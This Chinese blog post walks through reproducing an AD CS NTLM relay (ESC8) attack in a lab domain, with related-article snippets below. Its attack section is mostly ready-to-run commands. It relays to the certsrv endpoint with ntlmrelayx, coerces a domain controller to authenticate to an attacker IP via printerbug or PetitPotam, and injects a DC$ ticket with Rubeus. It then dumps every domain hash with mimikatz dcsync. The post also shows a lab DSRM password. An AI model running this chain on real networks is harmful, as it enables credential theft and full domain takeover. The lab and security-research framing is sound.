ADCS relay

已于 2022-09-14 17:50:04 修改
阅读量567 收藏
点赞数
分类专栏: 红蓝对抗-攻防安全 文章标签: 服务器 运维
于 2022-07-10 18:49:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/125706909
版权

目录

1 安装证书服务

将ADCS辅域控

检查域控机和辅域控机是否在Domain Computers组里

安装ADCS证书服务

2 复现过程

监听认证请求,并且转发给ADCS服务

触发NTLM认证

注入票据

导出域内所有哈希

1 安装证书服务

参考之前的方法安装ADCS服务https://blog.csdn.net/qq_38376348/article/details/119619726

将ADCS辅域控

 一路Next,勾选Active Directory域服务

一路next,点击安装后跳到这个界面

 next

DSRM密码

1234Qwer123

选择从主域复制

next

 

之后会重启操作系统

检查域控机和辅域控机是否在Domain Computers组里

检查域控机和辅域控机是否在Domain Computers组里,不在的话需要手动加入,否则漏洞利用会失败

未加入前报错

将主、辅域控计算机账户加入计算机账户到Domain Computers

 加入后

安装ADCS证书服务

 之后安装ADCS服务参考 AD CS安装_Adsatrtgo的博客-CSDN博客

 最后确认目标ADCSweb开启

2 复现过程

使用最新版本的Impacket包

监听认证请求,并且转发给ADCS服务

python3 ntlmrelayx.py -t http://10.211.55.7/certsrv/certfnsh.asp -smb2support --adcs

触发NTLM认证

让目标域控(10.211.55.3)向攻击机(192.168.0.102)主动发起NTLM认证

python3 printerbug.py hacktest/win7:'password'@10.211.55.3 192.168.0.102

 具体还有其他触发连接方式

https://github.com/topotam/PetitPotam
#格式:
python Petitpotam.py -d domain -u username -p password <ntlmrelayx listen ip> <dc ip>
https://github.com/NotMedic/NetNTLMtoSilverTicket
#格式:
python dementor.py -d domain -u username -p password <ntlmrelayx listen ip> <dc ip>

使用Rubeus导入当前票据,访问域控服务,Rubeus需要.NET 4.8

下载 .NET Framework 4.8 Web Installer

工具地址 https://github.com/GhostPack/Rubeus

使用方法
#格式:
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
#示例:
Rubeus.exe asktgt /user:DC$ /certificate:xxxxxxxxx /ptt
注入票据后
可以用klist查看

未注入票据之前可能会有一些缓存票据,清除一下

klist purge 

注入票据

工具地址 https://github.com/GhostPack/Rubeus

使用方法
#格式:
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
#示例:
Rubeus.exe asktgt /user:DC$ /certificate:xxxxxxxxx /ptt
注入票据后
可以用klist查看

导出域内所有哈希

mimikatz.exe
lsadump::dcsync /domain:hacktest.com /all /csv

复现过程中可能会遇到的报错KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type  

解决办法可以参考:

CVE-2022–26923 AD CS 權限提升 - Keniver's Blog

What's New in Kerberos Authentication | Microsoft Docs

域控组策略:Computer Configuration -> Administrative Templates (Computers) -> System -> KDC ,將 KDC support for PKInit Freshness Extension 

 

参考:

ADCS攻击利用_Slash_HK的博客-CSDN博客_adcs攻击
ADCS证书服务攻击_谢公子的博客-CSDN博客_adcs攻击

AD CS证书服务中继攻击_`GGyao的博客-CSDN博客_ad cs
利用黄金证书劫持域控 - 腾讯云开发者社区-腾讯云

Adsatrtgo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
域安全|AD CS Relay—ESC8
weixin_42282189的博客
03-24 7481
作者: 0xYyy 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 国外安全研究人员在6月份已经披露过攻击手法—通过证书进行中继从而来达到攻击域控的目的。 https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ 0x02 AD CS作用 1、证书颁发机构(CA):可以向用户、机构和服务颁发证书。 2、CA WEB注册:用户可以通过web浏览器申请证书。 3、联机响应程序.
深入分析域内ntlm relay to adcs服务的利用(含wireshark抓包分析)
m0_71746299的博客
01-27 272
前言 2021年中旬,specterops发布了一项针对域证书服务(adcs)的利用白皮书,文档中提到了19种对adcs服务的利用。本篇主要是分析文中提出的ntlm relay to adcs窃取证书的攻击流程,原理和抓包分析。 相关内容 ADCS介绍 Active Directory证书服务(Active Directory Certificate Services,下文简称ADCS)可以向用户,机构和服务颁发证书,收到证书的个体可以使用证书进行域内的身份认证,本篇中要利用的是ADCS配置的WEB证书请求
ADCS攻击之NTLM Relay攻击 ESC8
Adminxe的博客
03-05 528
ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制域控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。curl-I。
红队知识体系梳理4-relay
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-09 190
红队知识体系梳理4-relay
adcs7476.zip
最新发布
01-12
ADCS7476——高精度模拟数字转换器的深度解析》 在现代电子设备中,模拟数字转换器(ADC)是不可或缺的关键组件之一,它负责将连续的模拟信号转化为离散的数字信号,使得计算机能够处理这些信号。本文将深入探讨...
Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf
08-13
"Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf" 本文档主要介绍了如何使用JESD204B高速串行接口同步多个ADC器件的方法。该方法可以应用于许多通信、仪器仪表和信号采集系统中,满足低电压数字信号(LVDS)和...
Interfacing to High Speed ADCs via SPI
07-31
Interfacing to High Speed ADCs via SPI
3ADCs_DMA.rar
12-24
标题中的“3ADCs_DMA.rar”表明这是一份与微控制器(Microcontroller Unit, MCU)中的模拟数字转换器(Analog-to-Digital Converter, ADC)有关的资源,特别是关于使用直接存储器访问(Direct Memory Access, DMA)...
基于verilog的adcs7476程序
06-16
用verilog实现的adcs7476双路ad检测的文件,很好用
域渗透笔记-ADCS 域提权-ESC3
NoooEmotion的博客
02-03 430
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
Kerberos V5 Library Error Codes
zy531的专栏
02-02 4138
 http://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-admin/Kerberos-V5-Library-Error-Codes.html#Kerberos-V5-Library-Error-Codes Protocol error codes are ERROR_TABLE_BASE_krb5 + the protocol e
ADCS证书服务攻击
谢公子的博客
08-06 4480
ADCS支持几种基于HTTP的通过管理员可以安装的其他AD CS服务器角色功能。这些基于http的证书注册接口都是易受攻击的NTLM中继攻击,因为没有启用NTLM中继保护,而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此更安全的协议(如 Kerberos)无法使用。 http://10.211.55.4/certsrv/certfnsh.asp 漏洞复现 定位证书服务器机器 certutil -config - -ping ntlmrela
ADCS攻击利用
slash_HK的博客
12-23 4784
一万字呕心沥血,全站最详细ADCS攻击利用方法及细节复现,包括服务器配置等,细节满满,支持走一波,也欢迎各位师傅斧正。
AD CS证书服务中继攻击
网络安全。
03-05 3862
0x1 简介 AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。 注:借图 0x2 环境信息 域控(windows server 2016):192.168.3.129 辅控(windows server 2016):192.168.3.131(AD CS) 域内主机(windows 10):192.168.3.171 攻击机(kali):192.168.3.158 搭建ADCS证书服务:https://mp.
ADCS攻击之CVE-2022–26923
Adminxe的博客
03-06 550
该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。
【安全】Kerberos相关问题进行故障排除| 常见错误和解决方法
热门推荐
九师兄
01-07 2万+
1.概述 转载 为了学习:Kerberos相关问题进行故障排除| 常见错误和解决方法 2.总结 可以用来帮助诊断Kerberos相关问题的原因并实施解决方案的指南。 3. 症状 单击症状链接转到相应的疑难解答部分。 2.1 Kerberos tgt javax.security.sasl.SaslException: GSS initiate failed [Caused by GSSException: No valid credentials provided (Mechanism level: F.
配置AD @ Windows 2016
weixin_43394724的博客
01-27 706
IP地址配置 注意在IP地址配置的时候把DNS配成自己。 过程 默认是没有装AD的组件的 点击安装后,系统开始安装。 安装好了以后,管理面板出现了AD和DNS服务器 点击更多 将此服务器提升为域控服务器 功能级别决定了可用的 Active Directory 域服务 (AD DS) 域或林功能,同时还决定了可以在域或林中的域控制器上运行哪些 Windows Server 操作系统。 但是,功能级别不会影响已加入域或林的工作站和成员服务器上运行哪些操作系统。 Windows Server 20
adcs8162的三态是指什么
01-10
adcs8162的三态是指该器件的输入和输出信号可以分为三种状态:高电平、低电平和高阻态。高电平表示逻辑值"1",低电平表示逻辑值"0",而高阻态表示输入端和输出端之间呈现高阻状态,不会传输信号。 在实际应用中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值